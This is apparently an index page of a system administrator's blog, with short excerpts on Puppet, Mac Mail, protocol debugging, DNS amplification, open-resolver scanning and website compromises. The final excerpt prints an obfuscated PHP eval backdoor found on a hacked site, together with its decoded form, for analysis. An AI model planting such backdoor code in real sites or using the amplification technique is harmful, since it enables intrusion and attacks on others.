Creating facters on Windows

I’ve done automation with puppet for nearly 3 years on Linux but recently I have been tasked (work) with some automation on Windows. To tell you the truth I’m not exactly a fan of windows and never will be but I like a challenge. But for this particular tasks I needed a list of logical drives and a list of network adaptors and I couldn’t find anyone who had already created these facters.

PHP callback function backdoor

I recently had an incident at a customers website where the site was compromised. The customer went through the code and found several SQL injections, XSS and newly added files with backdoors (basic evals in PHP). All vulnerabilities was fixed (According to the customer) but about a month later the site was compromised again. Unfortunately no version control was used so we had to go through all files to help the customer and the log had no indications of successful attempts.

Missing unread mail count in the dock on Mac OS X 10.9 (Mavericks)

I’ve had plenty of issues with mail in Mac OS X but most of them have been related to the poor implementation of the integration with Exchange. But I have finally found a solution for one specific problem. That is the missing unread count in the dock. This is how I fixed it. Quit mail entirely and run from a command prompt # mv ~/Library/Mail/V2/MailData/Envelope* ~/Desktop/ Not open mail once again and it will do a import of all mails (Took about 2 hours on my machine but it depends on how many mails and mail accounts you have).

The lost art of debugging for admins #part 2 – Basic knowledge of protocols

Protocols Just a little knowledge about a few protocols can get you a long way when debugging. Often, clients does not give the full feedback from the server or tries to give a user-friendly error message which just makes it worse. Here is how just a handfuld of protocols can be used using telnet/openssl HTTP/HTTPS $ telnet 80 Connected to Escape character is '^]'. GET / HTTP/1.1 HOST: www.

The lost art of debugging for admins #part 1 - Basics and ptrace

Basics Its been a while since my last update. Been quite busy but also because I didn’t have anything to add. But lately I’ve have a urge to write a series on how to debug on Linux (Works on other platforms as well). Mostly because it seems that the younger generation (And even older) no longer debugs their problems but just seek the nearest forum so see if anyone else had the same issue.

DNS amplification by example

How it works DNS amplification is very easy to make and quite effective. An attacker finds a DNS resolver that is public, creates a spoofed UDP DNS request originating from the targets address sending the DNS response to the target. The trick in this attack is to create a bigger output then input (hence the amplification). What better way than to request a list of authority records for a top level like .

Scanning for recursive DNS servers

When working for an ISP it becomes pretty clear that you don’t want your customers or your network to participate in any attack. I wrote a small perl script to find DNS servers open for recursive requests I found 19 misconfigured DNS servers. Now the real work starts by contacting the owners.

Lancope stealthwatch

Had a nice meeting yesterday with Cisco and some guys from Lanecope. Must say that stealthwatch seems like a really great product. What their product does is that is collects all flows (and more). Sums it up so you can drill down via connections. Basically it does something like this on your netflow data ~$ nfdump -R /var/cache/nfdump/data/asr0/nfcapd.201302281130:asr1/nfcapd.201302281133 -o long 'dst host'|head -10 Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Flags Tos Packets Bytes Flows 2013-02-28 11:29:58.

PHP backdoor

Found this little thing on FB tonight. <?php eval(gzinflate(base64_decode("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"))); ?> After unrolling the endless loops it turns out to be <? @error_reporting(0); @ini_set("display_errors",0); @ini_set("log_errors",0); @ini_set("error_log",0); if (isset($_GET['r'])) { print $_GET['r']; } elseif (isset($_POST['e'])) { print(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); } elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit;?> a backdoor